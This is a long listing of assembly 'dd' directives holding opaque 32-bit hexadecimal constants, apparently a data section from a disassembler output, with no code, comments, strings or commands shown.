		dd 0C4761C9Dh, 0D4EBCBB4h, 86162728h, 0DC789B21h, 890ECAE3h
		dd 6C63A176h, 0FE76224Fh, 919ADEF0h, 0B1EAFA37h, 0B8333CD2h
		dd 883CB52Fh, 49B34EEDh, 0CA7FB441h, 0D1490F8Dh, 433F9DF3h
		dd 8CF3DB43h, 9650A407h, 0ABF7F31h, 4E84171Eh, 0CB678C0Fh
		dd 5FE1490Ch, 0F6E76DAh, 987A3CBBh, 9FBF9FD1h, 93A8CC43h
		dd 15DDD414h, 2D85DB7h,	8A738904h, 46A62DF1h, 381E69BDh
		dd 89786BABh, 3DF30CE6h, 0F5E09C17h, 0F17BAB50h, 0B8136197h
		dd 2ECB332Bh, 0C93272FAh, 56972EE9h, 49E7E345h,	0FD5028CBh
		dd 0AE5EDC5Ch, 0A174AA8Ah, 3A3E8D05h, 0FB82D944h, 6390BFD5h
		dd 599CE095h, 18E6AEFFh, 97696B97h, 0D38917DDh,	5B8EE9B1h
		dd 87F49FCDh, 7F34A1FDh, 763418D1h, 452746B4h, 63CB8ABDh
		dd 27392D9Ch, 2C277C51h, 0C2F45C1Eh, 0F57603C2h, 73797F3Bh
		dd 23A680D2h, 73B06658h, 7B38CC58h, 5AB33E35h, 25DECE28h
		dd 2613F5A9h, 7D9D840Bh, 86336632h, 0A7AF5B3Dh,	18DBBB6Fh
		dd 9AC2A8CCh, 0FF57855Dh, 80A8912Dh, 0F035DF65h, 0FC07D43Ch
		dd 7175F22h, 5AAC5CC5h,	5A8B5D5Dh, 0A17ABC11h, 9413A9BDh
		dd 78DF8704h, 78DA2F8h,	61F5DF66h, 23EA63C7h, 3B5C6B5Dh
		dd 0CCA616D9h, 5D6C9EC8h, 7F79E5FEh, 0C0FA4F8h,	7F081A1Ah
		dd 0B927A158h, 41D20322h, 0D77C5595h, 2F9A895Ch, 7A05D10Dh
		dd 0A995FABh, 0B45C19ADh, 96FB559Bh, 527690Eh, 7B91F8DEh
		dd 0E982CEBDh, 0B48ABC4Ah, 757F4BE7h, 85976C15h, 0A4B896E4h
		dd 3C995367h, 2DBCA468h, 0FC77C48h, 0AD95DEABh,	0C687DD8Bh
		dd 59671ED8h, 3E3D6949h, 7E7DACB0h, 3ABD7ED1h, 0ECF94AB9h
		dd 0F68FB565h, 8D46F9F3h, 17842FF1h, 1936EDD7h,	0F86FA65Dh
		dd 0F29CEFE9h, 3C7BC04Ah, 3F132E4Ch, 0E3E8E0Fh,	88715355h
		dd 3A34A1B1h, 6FD6F978h, 0AEF0B40Bh, 2F50B75Eh,	0F21894BFh
		dd 6927B460h, 48881ADBh, 44FA17F9h, 3B1617F4h, 17057EC8h
		dd 1895047Ah, 1EE030F2h, 730F1EF5h, 9CD196CBh, 0D36DC6E6h
		dd 10A209DBh, 0DB3A1F6Ah, 0CD4E3D57h, 0E7035312h, 0D508D606h
		dd 0F5653F2h, 0BDDA611Eh, 0B4E294E7h, 0C445FB92h, 0AA024E9Fh
		dd 2CD53B2Bh, 0A52AE46Bh, 359E44BEh, 0E402A12Ah, 2578B6BFh
		dd 9455A7FBh, 0CEB376EDh, 1AB58762h, 0C1F3192Bh, 19FF27D7h
		dd 0F8144F7h, 0B85D8EB6h, 0FE51E7FEh, 0F5D55E62h, 0A6795D0Ch
		dd 0BC695EC0h, 0BB815286h, 7D70552Dh, 5E11B4A3h, 157AFF2Ch
		dd 0FA8CEB21h, 48179EA0h, 646CDC51h, 5C24A0DAh,	0D86EEDA1h
		dd 0E7D85973h, 0EE434CE5h, 0A94881E8h, 0EB47E1E8h, 91F4F433h
		dd 55E82EAFh, 0E987C667h, 0F858D28Bh, 0AA639CC6h, 8AAF1EC7h
		dd 1F8E6A5Ch, 9BCF1D8Ah, 0CC1DFC56h, 0B82E3D6Ch, 0AC9158D9h
		dd 0A7E80E38h, 2D943310h, 1251E4A5h, 0B45555Eh,	413D76EAh
		dd 36877555h, 2A672790h, 0E1E4CE15h, 0FCF13287h, 16C7D0C7h
		dd 0FF8B085Fh, 418ADD7Ch, 1348CD12h, 384A6644h,	0A3DA0EA4h
		dd 0CD52E4F3h, 121490Dh, 0EEAC3207h, 97B394A1h,	34F28F10h
		dd 8FB71628h, 5ED52AEDh, 70086B3Dh, 0F7D5B455h,	847AD4F4h
		dd 9BAD3E16h, 0EBC93FDEh, 0BE7A9294h, 8A839997h, 8C959D8Ah
		dd 0FC858405h, 0E3C08DD3h, 0B6FD76CBh, 0B6BFEA8h, 1BB5B50Ch
		dd 9D92518Dh, 10E6972Ah, 0A9BF5A2Fh, 0E155A112h, 0D233DCC7h
		dd 0E07A7677h, 6445E8E1h, 8F54301Eh, 13AA7C6Fh,	0C179B95Fh
		dd 0E599A768h, 70E337D0h, 0F2E362E7h, 0B3ED6D0Bh, 67D396D9h
		dd 0F81E3E92h, 0AE0EA923h, 0DA0A779Fh, 0F3B185FDh, 0A5DFEEE9h
		dd 0ED51A2DFh, 250B84FCh, 0A9B5B756h, 0A423AB86h, 0B480E315h
		dd 17C9EB36h, 663EC582h, 28E8CB31h, 0D186B4EBh,	1DF85BA5h
		dd 75444AD7h, 0DD04F151h, 0E3DCE60Eh, 3F164F03h, 818E4CACh
		dd 89654148h, 0DB981114h, 27FBBC2Ch, 0B473CF32h, 5DFB0B1Ah
		dd 0ACB032F9h, 65F98579h, 0BD02627Bh, 83923E79h, 3CF1245Fh
		dd 0CCAAA299h, 91331EDFh, 5F3CEA15h, 3BFD1555h,	633AA259h
		dd 458BD6C7h, 4AAEB7Ch,	135F1DC3h, 1463C5A2h, 836C5FDAh
		dd 0A9B1902Eh, 2F7EA92Ch, 0B7747492h, 31BF3E24h, 476366F2h
		dd 718BE97Eh, 79EEAF33h
		dd 56C00D58h, 0D1E7866Dh, 5B351CF7h, 0AB96539Dh, 0BE15C6EFh
		dd 0CCCB332h, 0B726ACBAh, 0EACDAA6Ch, 4C49CF81h, 177FF951h
		dd 61557ED7h, 0A1690DC0h, 0F3BF23DBh, 852F87E0h, 0C5AD7635h
		dd 0E13373F7h, 43F155B4h, 833731B0h, 892F59AEh,	8BF077AAh
		dd 0BF1ECBDDh, 8240BFBFh, 0E858615Ch, 0EAFE6DB1h, 0AB90DD2Bh
		dd 31E67D17h, 1361E1D1h, 8EEED228h, 0DDC5F56Fh,	0D4AD23F2h
		dd 0B6BE46CFh, 2E91135Eh, 698C7AFCh, 0DF5CF6BBh, 1FF43F1Dh
		dd 70CA7D88h, 0E9687F3Ch, 47B9ECC9h, 58FA0C1Ch,	6C2A89D2h
		dd 54AA1269h, 8EECC629h, 0A812E8BFh, 518FBE06h,	0AEC2DCECh
		dd 81EEB271h, 0F1B02ED2h, 4BD78AC3h, 1F0C1978h,	0CACBE21Ch
		dd 0F3762160h, 0E3B49B7Eh, 78C0F42Ah, 7BCD8029h, 5500FCBCh
		dd 14CE165Dh, 0A9F4352Dh, 0D8970B5Ah, 8B1ED0A9h, 7F7C0D7Eh
		dd 0A36DA537h, 151F56DFh, 0BD4715E6h, 88CDDEB9h, 0F2E5383Ch
		dd 8A815AD1h, 0F9AA78E2h, 2BC375C0h, 0C0F5F3A1h, 727D54ACh
		dd 0EF4EA39Ch, 0F020378h, 0A4DBDDF1h, 0FDB1E9DEh, 796C3903h
		dd 0FF01AE50h, 9D5F945Ch, 0D8C93DF5h, 8CED6E74h, 851D6D70h
		dd 6F17A21Fh, 0FAE3BDD4h, 15DAEEE0h, 52DC181Fh,	5DC58D52h
		dd 5BA3A2BEh, 0B6779B53h, 78E6ADC6h, 0C7814A8Dh, 0AF062E6Ch
		dd 0AF672C44h, 1F04BF95h, 85982CD8h, 536C976Fh,	8818B148h
		dd 7973F618h, 16AD44CFh, 38F6E5FFh, 371A24D2h, 2FBD876Fh
		dd 16EA2F2Dh, 0B57B877Eh, 9B352CE1h, 58AD30ECh,	9C4B8387h
		dd 9CF7BA2Bh, 5BF06689h, 65B4356Dh, 8862276Fh, 0B4329967h
		dd 3BCAD51Ch, 0B1AEA66h, 75A26476h, 5EC7BB62h, 0FB4EFBA6h
		dd 0F819B84h, 3E1106E6h, 0A394E2F1h, 0CF81CC5Bh, 80F4D68Ah
		dd 8AAE8A36h, 0A2472B55h, 64EE2CD5h, 0EDA2A5D4h, 83A37B46h
		dd 323BF39Fh, 0E55C699Ch, 3FAEC979h, 53B3FE16h,	42935CFDh
		dd 0F8CF2E60h, 5E284361h, 0CAA64010h, 2534D57Ch, 2798141Ch
		dd 6A814246h, 382C1E94h, 0AA034B76h, 549ADD61h,	77A43AA6h
		dd 0F1920AA3h, 0F76F466Fh, 224F97F1h, 0E53017B6h, 44EE9D9Eh
		dd 0E381FA82h, 0BC7DD711h, 0BDD8816Fh, 875CD21Dh, 31173B46h
		dd 70D1BAB2h, 63EFDEEBh, 0EF29DA5Dh, 55BAC7A6h,	0EEA58A77h
		dd 0F697F2E9h, 63AD46D1h, 870FE09Ch, 676E5C3Bh,	4666C7C7h
		dd 61E77C24h, 4F81E1D5h, 43B050FCh, 55CCD729h, 5CF9526Dh
		dd 0F13B290Bh, 7CCF9979h, 9C9A8DE7h, 0EEFD4CBBh, 0DBBD532Ah
		dd 8EE7123h, 0E0DD281Dh, 0AA843A9Ch, 0E3275F8Dh, 766A3C5Bh
		dd 732381D8h, 0DBDEAB47h, 0C33D05CDh, 0F8E0AD35h, 8DDD2CD3h
		dd 62CE22AAh, 0C6EF1D54h, 0B88569Bh, 6675D721h,	43C21CE8h
		dd 5693978Dh, 8D7CFD24h, 74F3091Dh, 5DD117A8h, 6DFDA765h
		dd 5BAD3F60h, 0F9F578C7h, 75341BC0h, 65963AE9h,	0DA41BFDEh
		dd 13DFDBC0h, 7EC63753h, 990D5B47h, 2D22CF8h, 6AE0419Bh
		dd 0EA5E05F2h, 0F9159041h, 0FAE223C5h, 0D8753816h, 9162610h
		dd 2CBB3712h, 0B9776D8Dh, 0A87EFB67h, 6F22852Eh, 5E18AD90h
		dd 0B5D5FE7Fh, 0BD796259h, 2AFD1084h, 0C7C390FCh, 2817D2D0h
		dd 7AA586A2h, 0EF8D529Ch, 0B1639F45h, 0C52969A7h, 75A2DE32h
		dd 0B9DC2B4h, 505BE3BFh, 216AE079h, 0F264879Ah,	1AF66C10h
		dd 0F70CEA14h, 0AB804EDh, 270771F9h, 0D37F4F4Fh, 0B51C9ECDh
		dd 60E7286Ch, 0A3C46E4Bh, 0F3E586D1h, 0FF4F48Bh, 274170F9h
		dd 8DDAA18Ah, 0A43A96DBh, 7DAE35C7h, 0B9615A6Dh, 86F32FB4h
		dd 80512DD6h, 84E5387h,	6AF52625h, 0C547D4C3h, 906A7178h
		dd 0A5D15E3Dh, 3AE33EDDh, 0F9C03C49h, 0C71336CFh, 9543B707h
		dd 0DD0B5390h, 455907BFh, 0F38FF310h, 47707FA0h, 69F870E4h
		dd 1B290B29h, 5C6CAC39h, 1239877Ah, 4046958Dh, 6E96737Bh
		dd 4B47848Ch, 0BB257AC7h, 0F87BA83Bh, 12E21BDAh, 8DDE5CF8h
		dd 0FB7A10D6h, 49099C75h, 0AAAA0742h, 0AB7E5970h, 879973E9h
		dd 0E5303C1Ah, 0F58E44F9h, 7B5B3C2Dh, 5B123125h, 0D74A6D15h
		dd 0D9EFBF1Fh, 0BBC0E2D2h, 0A3728520h, 2954727Fh, 2FAF8C3Fh
		dd 51AD47DAh, 2016D5F7h, 67001767h, 0FBDD35AEh,	0B54AA2CFh
		dd 0B433C43Fh, 646B3AEDh, 0B376AA3Eh, 59BC4AC4h, 755464A0h
		dd 0B968D323h, 37DFD3E9h, 0B46B7E2Fh, 0E6A26564h, 0E667317h
		dd 54EAE91Dh, 8BD0ADF3h, 7694DE2Eh, 67A0150Eh, 6A76F7F1h
		dd 1CE4C9ECh, 0E55CC2FCh, 37E3E24Bh, 0D5BC7EAh,	0CEC530BCh
		dd 0FC78A981h, 7EDB0BDDh, 0E83F81B8h, 0A399471Fh, 7CBE77BEh
		dd 0B08D2547h, 8AAB6F83h, 315767A3h, 0B446479Ah, 3A565F4Bh
		dd 0AC616E1Fh, 0BC4C8E33h, 0B5813A0Bh, 0FE7AA413h, 2CE4E5C2h
		dd 39BEE960h, 0D179F4C7h, 0F70EFE9Fh, 0F2607B0Ah, 8D28FB4Bh
		dd 0B91EF199h, 0D34C7632h, 98892415h, 1037538Dh, 0C5B4D27Ah
		dd 1D79EAAEh, 83DBE346h, 416C4A63h, 6992867Eh, 0EEE6B5DDh
		dd 0EB7DC183h, 9D5EB81h, 4AA97BD9h, 7C23A393h, 1AE1B232h
		dd 2C103B1Ch, 0C3524341h, 0B6A2FC2Dh, 6F2BE838h, 0D575B4BAh
		dd 0B2FF3931h, 726CDD0Ah, 0D1CD2859h, 0BC55572Ah, 0F690AFD1h
		dd 84078524h, 0F3ABAE05h, 80B041F4h, 1FF3F011h,	0B57BB43Eh
		dd 572C5EEFh, 4A6546C2h, 0B7D6B72Fh, 0E33BBEF5h, 2DA297FBh
		dd 6B81B10Dh, 91B43D6Bh, 0CC22353Bh, 5C1ED5D4h,	7C594374h
		dd 697B49E7h, 0FC2C6E8Eh, 0EFDCEA45h, 0ACD40832h, 0D5E475C6h
		dd 0C74B2AA4h, 0D609405Ah, 35F76ABAh, 437D918Dh, 73094617h
		dd 0CE551F63h, 0E93A6FB1h, 524B279Fh, 0F35FC434h, 8CDA3D12h
		dd 56A08BBAh, 5A707FA3h, 342F15EBh, 80503F8Fh, 0AB225AB9h
		dd 1D8F5E32h, 0D56DF8A8h, 438731B1h, 1087FAD0h,	8FFC8B13h
		dd 7E8BE0A8h, 0AA6CA121h, 0B65713E6h, 0ACAEFD03h, 8BF817F1h
		dd 8F55C90Eh, 0E921E872h, 0F5C26558h, 0C5B8B81Fh, 487E71F6h
		dd 3057A8D7h, 0B1DF3627h, 0ABCBF06Eh, 35357E2Dh, 0D32986B9h
		dd 0C371629Dh, 0DD155193h, 5DA215FEh, 0CEE3D415h, 9EAD95FDh
		dd 1E0FE574h, 0D192665Bh, 0F8398A26h, 0D6C663E1h, 0F405A425h
		dd 7A8793ECh, 17E540D7h, 5BCF0B63h, 6DBDAA01h, 19F63528h
		dd 708655AFh, 0C1FC7F85h, 0A0AF02C6h, 0C64187E1h, 0C4C820h
		dd 89A694C7h, 0B3860FF3h, 5024918Dh, 0ABA095D9h, 7A965A3Eh
		dd 81E5B88Ah, 3636AB41h, 0E9D2633Ch, 0BFD84192h, 44256508h
		dd 5685B6F1h, 0E6FA3F68h, 4BD2F517h, 0BFACB949h, 2F20024Bh
		dd 88FB8DB7h, 0A6507309h, 4E75083Ch, 8A57731Fh,	0A346E052h
		dd 0DA189A75h, 86F27116h, 636933DCh, 1A2A0B08h,	6BF4A451h
		dd 1590752Dh, 851BFF43h, 0E1AF50AFh, 542DD986h,	0D97B437h
		dd 0DFB613DDh, 0FC654F9h, 621FE7F5h, 607C79EBh,	96E362FEh
		dd 86E5502Bh, 0AB79BCABh, 358FDBFAh, 1A04713Fh,	0EA678EBEh
		dd 5FBD5237h, 6E9240C2h, 16C5DFB6h, 5B56122Fh, 0AF31657Ah
		dd 0C70AB9EEh, 0AD1C0771h, 0AAC8AD55h, 71730C57h, 0CABFA7FBh
		dd 0B649E73Ch, 65806717h, 0BB809D19h, 6ECA8A6Ch, 0B83CF949h
		dd 2E5CA174h, 0D47CF886h, 0AEF7C6A9h, 9FD4BBEEh, 2A49994Ch
		dd 9C39ED1Fh, 0F4A43559h, 0AA7F7C85h, 0E0585301h, 6ECCBBF6h
		dd 0C3C09E68h, 380E8257h, 27DAF77Fh, 0D8E8BF2Eh, 213533C0h
		dd 843277D9h, 420BDED6h, 0FC45E359h, 0F497D056h, 768F5715h
		dd 0F9676778h, 998681F9h, 0D8BB3E72h, 9A3CEE78h, 0F63F10h
		dd 185EA1B7h, 0AAB0DC98h, 0E6B8B6B4h, 0CB4B7A4Fh, 5CB5E553h
		dd 5559755h, 672C682Eh
		dd 0AEBE87A4h, 0AE605A8Ch, 702F850Ah, 8F2C5914h, 294B3607h
		dd 1A3DD071h, 0DF56BB1Fh, 0A4C316D6h, 0B84D754Ch, 77ABCBD9h
		dd 4C3C1DA3h, 0ADF85158h, 0AAED4859h, 7C83E6A0h, 213A26Bh
		dd 0ADF26955h, 34564976h, 0A1291883h, 6BBE0E13h, 0A34159FFh
		dd 0B8EF63C5h, 0C77A3389h, 5E959C8Eh, 37B675D4h, 95FBC897h
		dd 5B91F300h, 5609E5A3h, 1E69C3F8h, 0F3EB0925h,	0BAFB022Fh
		dd 57BBEF3Bh, 77DE4751h, 0DFB8B4ACh, 938FDCB9h,	0F02C27Dh
		dd 0F0AF481Dh, 11E69788h, 9C9580C9h, 0F9AA3BB1h, 6595FB63h
		dd 9967F625h, 0A96AF26h, 7BA03F5Bh, 0C8BA09BCh,	0E741D2C1h
		dd 0FEBA2181h, 0E487A873h, 5DD591BDh, 1D54E279h, 954FC675h
		dd 942DA8D8h, 0B6932C12h, 0DA7562A4h, 0C754FF13h, 0F9EB5213h
		dd 0D91F81Eh, 8B4C1DFh,	4F815AD7h, 0CA907CD0h, 0E391CC5Ch
		dd 0CC67CE85h, 9E47C4B1h, 87E01EBDh, 0E049A105h, 63D1EAF3h
		dd 0EB80FAE7h, 0E5BB171Fh, 0B153EA95h, 13E3A036h, 0F1559E46h
		dd 24384B83h, 0BE3BD3BCh, 8D609065h, 0AE4A6954h, 780DBEEEh
		dd 0C8568EFh, 59BAA694h, 0F2A516Ch, 1B3315AEh, 0DD9C0C7Fh
		dd 473BAE81h, 0BA21EB27h, 0E5B1EF2Ch, 88EB998Fh, 3DF719C7h
		dd 0F75EF37Ah, 0FBA6D042h, 456612FEh, 0F7A3B2C7h, 1F5ED897h
		dd 8935FC58h, 0EDACBF8Bh, 0AE630D49h, 866F4816h, 20ACF720h
		dd 4C061EC8h, 0A82953AFh, 4A26DFC4h, 68FA2BE8h,	0F1B10AF7h
		dd 91A1709Dh, 0FE0C426Bh, 24C7692Eh, 872427C3h,	81E490BDh
		dd 0D4ADAB19h, 0B659E8EAh, 1D3CDB6Eh, 0E8F8F274h, 6B50E6C2h
		dd 0D58164A0h, 0E9F374AEh, 0CC54EB7Ah, 18758B62h, 2A4C4B9Dh
		dd 5EBD533Fh, 16A6D199h, 38F8017Fh, 7E17F964h, 0EF592D19h
		dd 0F0736643h, 3D9A61B0h, 93529FAEh, 3074C4A1h,	0F331B1FCh
		dd 0ABBDABDAh, 0AA2F32FEh, 25092774h, 0CE4864ABh, 8A5FBA2Ah
		dd 0EDB97DAAh, 9FF2B555h, 0D43EB5FDh, 0E7ED24D3h, 0C8A51CA5h
		dd 40F9B02Ah, 4674CE9h,	745C7C1Fh, 0C800FC7h, 0EB00E252h
		dd 54A0696Ah, 0EA612D8Fh, 97F86F45h, 0DBEAB2A3h, 4615576Fh
		dd 6B575288h, 24B15015h, 5B4D0453h, 0CC6AF7D1h,	8EBC2A3h
		dd 39FE2ED9h, 6D14EF4Bh, 2A93875Dh, 0C176BD2Eh,	0B0FC81EFh
		dd 3CB63B32h, 0F65265FAh, 0E15CFAD7h, 0D1BD4A7Dh, 4CA8A4D2h
		dd 1C8757F3h, 0B2D23C41h, 0AD2C6D54h, 255D7354h, 0C92B66B6h
		dd 0B73FEE60h, 8C24BD8Ah, 7220D4AFh, 576515Ah, 7277DFA7h
		dd 8999B23Eh, 7CF68A41h, 0FF736720h, 9D3328CDh,	5DC9FA6Dh
		dd 5F974504h, 9FECBEC2h, 5CA5F39Ah, 79503731h, 0B5C0199Ah
		dd 662077E0h, 4DD4F1ACh, 5ACB7F0Ch, 415F8BE9h, 193C05F4h
		dd 1BB73B57h, 879BAF0Eh, 325F5377h, 0D8BCE07Ah,	7D0A97BCh
		dd 0CBB76C3Dh, 434AA0D4h, 0B36030E6h, 0AB0CBF7Ah, 55D67059h
		dd 0A8EF6D13h, 0DA8E53D2h, 0CCD54EA5h, 21DE02B3h, 4B2376D1h
		dd 8673D721h, 0D19FF51Fh, 3B54C99Eh, 0D0447157h, 0CC2E18FCh
		dd 44BA2E7Bh, 0F0BAD1EAh, 9DA31871h, 0FF6BD8FAh, 0D381F14Fh
		dd 0C3789D0Fh, 2DBBEA98h, 0ACAE25DDh, 8AFFE9A2h, 0E7BFFDCFh
		dd 69A75C68h, 88FF31EDh, 404AE32Fh, 45413F93h, 0E8ABA0B1h
		dd 1EA01F91h, 12B89AEDh, 2CA2D7ADh, 6953CE62h, 8AD7DE62h
		dd 3C180C78h, 1E183AA7h, 0F12F5FEDh, 0FEADF871h, 0B0D2C559h
		dd 0DAB9E80Ah, 0FAFA67B7h, 0A98C5824h, 2F3B9038h, 0A263018Eh
		dd 1913D537h, 4F5A79ADh, 0B6F69D75h, 0F2A9FB0Dh, 0F15FFDA9h
		dd 4B45B929h, 0B5E47B9Ch, 0B03C05DDh, 0ED92FB76h, 6CDA6FD6h
		dd 87E2C154h, 26644126h, 0E37A2E9Eh, 0AF3B1ADFh, 0DD2B12A0h
		dd 0B8B89655h, 9B72C673h, 0FA4FD149h, 107FD5A2h, 0D2433329h
		dd 0B1FD4529h, 0D647B12Fh, 0B72B2833h, 15554A02h, 0BABE1D24h
		dd 29F4B2Bh, 7DE287Eh, 61C2EF02h, 0EBF2E112h, 0DBE609EAh
		dd 40428F6Ch, 0D979B372h, 846DBFD5h, 2FCE2D74h,	0CF846769h
		dd 0FB9D8F83h, 9F8B607Eh, 0F9CF362Ah, 0DF65EF4Ah, 1FB8BC9Fh
		dd 0D37CFF22h, 0E3B5B987h, 0BAF96F2Ah, 97C072F6h, 0B999AE21h
		dd 7274B9FDh, 0E948983Dh, 1DC9CB63h, 0A2EB83Eh,	8D87C756h
		dd 0B53EABC6h, 2505CA8Fh, 0CAB21F84h, 5DAF1CBAh, 0A9E93D6Dh
		dd 5BD28AD0h, 8DF55A75h, 0D67D38DBh, 96329609h,	3CFD01C9h
		dd 34CDB361h, 0BBA96AA5h, 0C4BAB5F7h, 45F18BF2h, 7AC41A71h
		dd 0C55CDF1Fh, 853A2D12h, 0B3D43F92h, 4B2E631Ch, 0FEB5DB1Ah
		dd 0AFF4B303h, 0B24BF663h, 4BA7C5Fh, 0DB6E776Dh, 777BC3F0h
		dd 0DA3E4AA4h, 0CC9512ABh, 0AA6E5B4Bh, 60C5E990h, 175CFBBEh
		dd 0EFD0A248h, 2D19BD53h, 3C8991F6h, 0B13783AAh, 0BE0981BFh
		dd 5D7C6FDEh, 0EDBD0D4Ah, 2660B460h, 2AFD7E7Eh,	0ECBBB425h
		dd 0D688CD1Bh, 4F6B6CA9h, 4945B194h, 27DF6870h,	0E573F025h
		dd 0EC3D3FB6h, 0D16B0B6Eh, 3ED8C886h, 0D3BA5892h, 0EFD5F505h
		dd 0D852073Fh, 5A2E2CF9h, 1B16F08Ah, 81F57FBAh,	797F0D35h
		dd 5EB7DD17h, 5DA26A38h, 0DC7782B2h, 0C678F24Ah, 7F2CC5B8h
		dd 0DFBED554h, 0DCEB5F5Ch, 6E23B140h, 0F62D1434h, 0A1E716A5h
		dd 70E69FDDh, 78D0BDDDh, 766FB83Ch, 0CF112ACBh,	9B3ACF08h
		dd 0E29F25E1h, 0D64CEF9Ch, 46D92947h, 7149D382h, 0DFA4963Ch
		dd 1027C4BDh, 50DFC1E2h, 3A5E8F9Eh, 0B6CCD976h,	98B4906Dh
		dd 0DE92383Ch, 77262DE1h, 75A2DE5Ah, 0E649E671h, 0E3BCD895h
		dd 8E4DA7F7h, 0CCB7B65Dh, 0CA3A6225h, 0D97F97F8h, 9F8A72FBh
		dd 851B4C54h, 0F872B4A9h, 0C43F1B6Bh, 0DD0D12CAh, 4C981B60h
		dd 1FC1E2F5h, 31AF8DCBh, 0A84BD764h, 7C6C2B88h,	5EE367D2h
		dd 0A25C885h, 2E2F7C03h, 888A06CBh, 94C6F825h, 86CDAF51h
		dd 57742E2h, 7AB752D9h,	0D7073A83h, 7D635B72h, 5136DBCFh
		dd 2CD144BEh, 63D01305h, 40A9794Ah, 0AA69D81Bh,	99FBAEFCh
		dd 554DB1B5h, 0FCBA5BC5h, 0C6979328h, 95C69320h, 2394B15Ch
		dd 813ADC71h, 48E755EFh, 0D5FDEB95h, 0EE36D63Ah, 7EB7A3DFh
		dd 0BEC44BF3h, 60AD1542h, 697331Ch, 0B815DA53h,	0F728D6A4h
		dd 0C4467697h, 575E5BF3h, 2692C0C1h, 6228B726h,	11BB5BE3h
		dd 82BC8950h, 10A319B1h, 276ADCC1h, 0EABEE936h,	7AC8DA56h
		dd 10183DC7h, 0C086B936h, 0C1F37F49h, 11FCA951h, 0F5A25DB6h
		dd 0B2664F6Ch, 0C739DF55h, 83DD9EA0h, 0FAA7A3EDh, 3D95DA4Bh
		dd 0C934512Fh, 28D66B52h, 7E3FDB72h, 0A39BDA01h, 0BF256291h
		dd 0DF079C2Eh, 5E644D19h, 6A1CC563h, 0AD4692AEh, 92EF38B2h
		dd 38B807B5h, 9B0DE129h, 0FDF83F07h, 595C39F0h,	0FE9BA632h
		dd 45841556h, 0F6DEA2C9h, 49EFD34h, 515BDF22h, 6122DA5Ah
		dd 4E417FC4h, 7ACBBFCCh, 0EA94C26Ch, 5A5A20D8h,	41E9255Ch
		dd 21F248AEh, 99BF5477h, 43613527h, 7D49CC33h, 0E648F83Fh
		dd 6F6E8836h, 0E8E55439h, 5101EE8Fh, 369613E1h,	1B0F4462h
		dd 0F2E04634h, 39E2D1C0h, 6639D0Ah, 2C4FFBCh, 0C35728ABh
		dd 4B414E1Dh, 0E2CC581Ah, 0D633CF56h, 5A7BE528h, 8A74ADF8h
		dd 1A18DAFFh, 1D4905BFh, 0D2C42356h, 0A2DE20E0h, 0C1CCD2A0h
		dd 7FFEDABBh, 0CAF6067Bh, 0CC6E32F8h, 0A7E099F8h, 0EC9CDDC7h
		dd 0EB2891B9h, 0F6A8C8CBh, 0AA914517h, 514CBFA3h, 0D4779F36h
		dd 70961F8Dh, 0CB463F91h, 0BA6BB3Bh, 3DF17BB9h,	0A2733F95h
		dd 0A5599750h, 0AE98EFB9h, 0DD36DE6Ch, 0F79178A7h, 36B445CEh
		dd 554D4E71h, 91139570h, 0C4DDD75Dh, 6D133126h,	81627164h
		dd 415DF90Ah, 17877B23h
		dd 58F5459Eh, 116FE3A0h, 80415E74h, 0DCBFD99Dh,	7B3C5749h
		dd 0B097421Fh, 8A4B0A58h, 15053C8Ah, 0AD057124h, 0CF8D4E5Dh
		dd 5DB8AA32h, 7E3365E6h, 4D495BC8h, 0BA58D4EAh,	36B6C91h
		dd 4975877Eh, 0BED9BAAAh, 0D51D5354h, 7C6BA44Ah, 8EEA87E0h
		dd 9AEA3463h, 123B04ACh, 964EEB9Bh, 0DD61E77Dh,	0D49BFDA3h
		dd 0B7C5B7C5h, 0AE030BBDh, 36EE8A76h, 67D05C8Dh, 0AB97211Ch
		dd 4AA698EBh, 4891D520h, 2398E458h, 1574AAF1h, 6B0FDA5Fh
		dd 0A36F3682h, 0B3BB284Ah, 0A9D9524Bh, 534D9DD4h, 8504038h
		dd 0E4BAF6D9h, 735F124Bh, 355A0E91h, 55948C4Dh,	0B9D6E7CDh
		dd 64F63737h, 71F0289Ah, 0C3738F40h, 6ED9BE7Bh,	4D6B4AA2h
		dd 64B7BB34h, 0C347E7AEh, 19773990h, 897D80FFh,	4762EAFFh
		dd 50B736AFh, 6FEDFAD2h, 8652760h, 7486039Ch, 5E273D8Fh
		dd 0EF0EF55Dh, 99E9167Dh, 6E6AF92Ah, 5782CCC9h,	0C1A06A35h
		dd 15BB7E6h, 686EE91Ch,	548AD255h, 1A49D6ECh, 0F2B52D33h
		dd 0C68128C0h, 1B35F6B9h, 82BB75E2h, 5755B19Ah,	1347C0Dh
		dd 14CEF0B0h, 33A60C2Dh, 6D81B594h, 0A5523C25h,	9ABB2D1Eh
		dd 6837316Ah, 66D52584h, 23ECFB2Eh, 29FDCF09h, 6D173E09h
		dd 0D348FE79h, 66662CC7h, 497FB270h, 8E2B780Bh,	32A2F18Eh
		dd 0E5501E96h, 0A1B9EA8Fh, 0CC2DB46Fh, 43F108BAh, 17F9AEB7h
		dd 0C5AB359Fh, 0A3999F16h, 5223C2C4h, 92D1681Fh, 620F4C96h
		dd 0A62BF9A2h, 0FA203B22h, 740A7719h, 0E05BAA56h, 0F9017EA2h
		dd 2F312517h, 34A17E3Dh, 0E3A732F0h, 9C6A982Ah,	2AF800D3h
		dd 0E823E113h, 9086211h, 336FBF19h, 98FEE85Ah, 0E66EF630h
		dd 5FA6BF0Dh, 6199956Bh, 267EE6D6h, 7C33B668h, 52D117D6h
		dd 0EEA8920Ch, 0C4135A99h, 0F30D2E0Eh, 8BEBC1E5h, 3F145715h
		dd 0BC1BD052h, 8175D471h, 999F3AACh, 0D708E2F1h, 0AD8DB878h
		dd 3AD8DA12h, 57F2D53Fh, 5396827Eh, 0AE0123BCh,	0A92E834Fh
		dd 79B1ABE6h, 59079E9Dh, 3C19C3F0h, 0E7B67B91h,	0AD5C4C24h
		dd 17CEBED9h, 7259DC58h, 0BC8A18C6h, 2C639822h,	7EEA13F1h
		dd 0DDECBA15h, 3C591E68h, 3CC4EBA9h, 7DA319B0h,	4B583CCDh
		dd 706FF7CAh, 0CDB14F0Dh, 0CA6B13CAh, 5DDD7DA1h, 9B95BC76h
		dd 0F2FA9C36h, 0FC98874h, 0FA3BCB27h, 0B6EAC565h, 0BD716BEAh
		dd 92B84B11h, 246DF60Ah, 0ABB6AF3Fh, 5DB56726h,	9A52A145h
		dd 3B526B89h, 4508EA09h, 7CE72CEFh, 0B95FF449h,	35316BE1h
		dd 429BEFDh, 3B80FB65h,	0A832259Ah, 7A9699D8h, 0E31DB196h
